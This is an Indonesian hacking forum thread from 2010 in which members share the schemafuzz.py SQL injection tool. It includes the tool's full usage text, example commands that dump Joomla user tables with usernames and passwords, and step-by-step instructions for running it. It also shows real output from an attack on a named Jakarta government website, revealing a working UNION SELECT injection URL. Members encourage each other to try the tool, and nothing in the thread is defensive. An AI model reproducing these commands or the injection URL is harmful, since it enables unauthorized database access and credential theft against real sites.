Latest topics
IBC chat

ShoutMix chat widget
Navigation
 Portal
 Index
 Memberlist
 Profile
 FAQ
 Search

Tua oke...

Go down

Tua oke...

Post  g34rboxxx on Tue Jun 08, 2010 7:58 pm

schemafuzz.pl .... find in google ..


Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot
]com darkc0de.com
Modes:
Define: --dbs Shows all databases user has access too.
MySQL v5+
Define: --schema Enumerate Information_schema Database.
MySQL v5+
Define: --full Enumerates all databases information_schema table
MySQL v5+
Define: --dump Extract information from a Database, Table and Column.
MySQL v4+
Define: --fuzz Fuzz Tables and Columns.
MySQL v4+
Define: --findcol Finds Columns length of a SQLi
MySQL v4+
Define: --info Gets MySQL server configuration only.
MySQL v4+

Required:
Define: -u URL "www.site.com/news.php?id=-1+union+select+1,darkc0
de,3,4"

Mode dump and schema options:
Define: -D "database_name"
Define: -T "table_name"
Define: -C "column_name,column_name..."

Optional:
Define: -p "127.0.0.1:80 or proxy.txt"
Define: -o "ouput_file_name.txt" Default is schemafuzzlog.
txt
Define: -r row number to start at
Define: -v Verbosity off option. Will not display row #'s in dump
mode.

Ex: ./schemafuzz.py --info -u "www.site.com/news.php?id=-1+union+select+1,dar
kc0de,3,4"
Ex: ./schemafuzz.py --dbs -u "www.site.com/news.php?id=-1+union+select+1,dark
c0de,3,4"
Ex: ./schemafuzz.py --schema -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D catalog -T orders -r 200
Ex: ./schemafuzz.py --dump -u "www.site.com/news.php?id=-1+union+select+1,dar
kc0de,3,4" -D joomla -T jos_users -C username,password
Ex: ./schemafuzz.py --fuzz -u "www.site.com/news.php?id=-1+union+select+1,dar
kc0de,3,4" -end "/*" -o sitelog.txt
Ex: ./schemafuzz.py --findcol -u "www.site.com/news.php?id=22"
Try it .... and feel it ....
avatar
g34rboxxx
Admin

Posts : 250
Join date : 2009-10-19
Age : 41
Location : Tebak hayooo

View user profile

Back to top Go down

Re: Tua oke...

Post  vailo on Tue Jun 08, 2010 9:29 pm

g34rboxxx wrote:schemafuzz.pl .... find in google ..


Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot
]com darkc0de.com
Modes:
Define: --dbs Shows all databases user has access too.
MySQL v5+
Define: --schema Enumerate Information_schema Database.
MySQL v5+
Define: --full Enumerates all databases information_schema table
MySQL v5+
Define: --dump Extract information from a Database, Table and Column.
MySQL v4+
Define: --fuzz Fuzz Tables and Columns.
MySQL v4+
Define: --findcol Finds Columns length of a SQLi
MySQL v4+
Define: --info Gets MySQL server configuration only.
MySQL v4+

Required:
Define: -u URL "www.site.com/news.php?id=-1+union+select+1,darkc0
de,3,4"

Mode dump and schema options:
Define: -D "database_name"
Define: -T "table_name"
Define: -C "column_name,column_name..."

Optional:
Define: -p "127.0.0.1:80 or proxy.txt"
Define: -o "ouput_file_name.txt" Default is schemafuzzlog.
txt
Define: -r row number to start at
Define: -v Verbosity off option. Will not display row #'s in dump
mode.

Ex: ./schemafuzz.py --info -u "www.site.com/news.php?id=-1+union+select+1,dar
kc0de,3,4"
Ex: ./schemafuzz.py --dbs -u "www.site.com/news.php?id=-1+union+select+1,dark
c0de,3,4"
Ex: ./schemafuzz.py --schema -u "www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4" -D catalog -T orders -r 200
Ex: ./schemafuzz.py --dump -u "www.site.com/news.php?id=-1+union+select+1,dar
kc0de,3,4" -D joomla -T jos_users -C username,password
Ex: ./schemafuzz.py --fuzz -u "www.site.com/news.php?id=-1+union+select+1,dar
kc0de,3,4" -end "/*" -o sitelog.txt
Ex: ./schemafuzz.py --findcol -u "www.site.com/news.php?id=22"
Try it .... and feel it ....

affraid affraid affraid what d'....?! deskripsi nan penjelasannya pilzzz... bounce bounce bounce
avatar
vailo

Posts : 137
Join date : 2009-10-18

View user profile

Back to top Go down

Re: Tua oke...

Post  g34rboxxx on Tue Jul 06, 2010 4:19 pm


Use python ...bisa di win32/linux..
Buka cmd .... jangan lupa install dulu pythonnya ....download dari mbah google ya ....
Razz Razz Razz ....trus buka seperti ini ...


C:\Python26>python.exe schemafuzz.py -h

tekan enter hasilnya


Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot
]com darkc0de.com
Modes:
Define: --dbs Shows all databases user has access too.
MySQL v5+
Define: --schema Enumerate Information_schema Database.
MySQL v5+
Define: --full Enumerates all databases information_schema table
MySQL v5+
Define: --dump Extract information from a Database, Table and Column.
MySQL v4+
Define: --fuzz Fuzz Tables and Columns.
MySQL v4+
Define: --findcol Finds Columns length of a SQLi
MySQL v4+
Define: --info Gets MySQL server configuration only.
MySQL v4+

Required:
Define: -u URL "www.site.com/news.php?id=-1+union+select+1,darkc0
de,3,4"

Mode dump and schema options:
Define: -D "database_name"
Define: -T "table_name"
Define: -C "column_name,column_name..."

Optional:
Define: -p "127.0.0.1:80 or proxy.txt"
Define: -o "ouput_file_name.txt" Default is schemafuzzlog.
txt
Define: -r row number to start at
Define: -v Verbosity off option. Will not display row #'s in dump
mode.

Ex: ./schemafuzz.py --info -u "www.site.com/news.php?id=-1+union+select+1,dar
kc0de,3,4"
Ex: ./schemafuzz.py --dbs -u "www.site.com/news.php?id=-1+union+select+1,dark
c0de,3,4"
Ex: ./schemafuzz.py --schema -u "www.site.com/news.php?id=-1+union+select+1,d
arkc0de,3,4" -D catalog -T orders -r 200
Ex: ./schemafuzz.py --dump -u "www.site.com/news.php?id=-1+union+select+1,dar
kc0de,3,4" -D joomla -T jos_users -C username,password
Ex: ./schemafuzz.py --fuzz -u "www.site.com/news.php?id=-1+union+select+1,dar
kc0de,3,4" -end "/*" -o sitelog.txt
Ex: ./schemafuzz.py --findcol -u "www.site.com/news.php?id=22"

contoh :
C:\Python26>python.exe schemafuzz.py --findcol -u "http://bplhd.jakarta.go.id/beritadetail.php?&idg=-1"

hasilnya

Code:

| rsauron[@]gmail[dot]com                                v5.0  |
|  6/2008      schemafuzz.py                                  |
|      -MySQL v5+ Information_schema Database Enumeration      |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                        |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|

[+] URL: http://bplhd.jakarta.go.id/beritadetail.php?&idg=-1--
[+] Evasion Used: "+" "--"
[+] 15:57:29
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,6,7,
[+] Column Length is: 8
[+] Found null column at column #: 1
[+] SQLi URL: http://bplhd.jakarta.go.id/beritadetail.php?&idg=-1+AND+1=2+UNION+
SELECT+0,1,2,3,4,5,6,7--
[+] darkc0de URL: http://bplhd.jakarta.go.id/beritadetail.php?&idg=-1+AND+1=2+UN
ION+SELECT+0,darkc0de,2,3,4,5,6,7
[-] Done!
avatar
g34rboxxx
Admin

Posts : 250
Join date : 2009-10-19
Age : 41
Location : Tebak hayooo

View user profile

Back to top Go down

Re: Tua oke...

Post  sinax89 on Mon Jul 26, 2010 1:44 pm

wah.... ini teknik yang pake darcode... sya pernah coba ..!! memang ampuh nie scrip schemafuzz.py..... jadi teringat masa lalu... hehe...
avatar
sinax89
Admin

Posts : 72
Join date : 2009-10-13
Age : 28
Location : Bekasi

View user profile http://ibc-forum.forumc.biz

Back to top Go down

Re: Tua oke...

Post  Sponsored content


Sponsored content


Back to top Go down

Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum